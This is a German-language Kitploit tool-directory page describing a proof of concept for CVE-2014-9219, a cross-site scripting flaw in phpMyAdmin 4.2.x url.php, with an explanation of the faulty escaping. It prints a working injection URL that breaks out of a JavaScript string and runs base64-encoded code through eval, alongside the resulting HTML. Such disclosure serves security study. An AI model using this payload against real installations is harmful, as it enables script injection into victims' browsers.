Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2014-9219 — CVE-2014-9219 XSS POC | Kitploit
Tools/GitHubGitHub/mohmadhafiz/cve-2014-9219
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubmohmadhafiz/cve-2014-9219

CVE-2014-9219

CVE-2014-9219 XSS POC

Repository anzeigen
vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2014-9219

CVE-2014-9219 XSS POC

Über

Die Schwachstelle wird durch einen Fehler bei der Eingabevalidierung in der Weiterleitungsfunktion in url.php in phpMyAdmin 4.2.x vor 4.2.13.1 verursacht, wenn der URL-Parameter verarbeitet wird. Ein entfernter Angreifer kann das Opfer dazu verleiten, einem speziell präparierten Link zu folgen, und beliebigen HTML- und Skriptcode im Browser des Opfers im Sicherheitskontext der verwundbaren Website ausführen.

Betroffene Version

phpMyAdmin: 4.2.0 - 4.2.13

Problem

Der anfällige Code verwendet htmlspecialchars(), um den URL-Parameter zu bereinigen, bevor er in einen JavaScript-String-Kontext eingefügt wird:

root@kitploit:~
window.location='" . htmlspecialchars($_GET['url']) . "';

htmlspecialchars() ist für den HTML-Kontext ausgelegt, nicht für den JavaScript-String-Kontext. Zeichen, die aus JavaScript-String-Literalen ausbrechen können, werden nicht ausreichend escaped.

Siehe den Commit

POC

URL-kodiert:

root@kitploit:~
url.php?url=http%3A%2F%2Fwww.phpmyadmin.net%2F'%2beval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))%2b'

URL-dekodiert:

root@kitploit:~
url.php?url=http://www.phpmyadmin.net/'+eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))+'

HTML-Ausgabe:

root@kitploit:~
<script type='text/javascript'>
            window.onload=function(){
                window.location='http://www.phpmyadmin.net/'+eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))+'';
            }
        </script>Taking you to http://www.phpmyadmin.net/'+eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))+'.
Tool herunterladen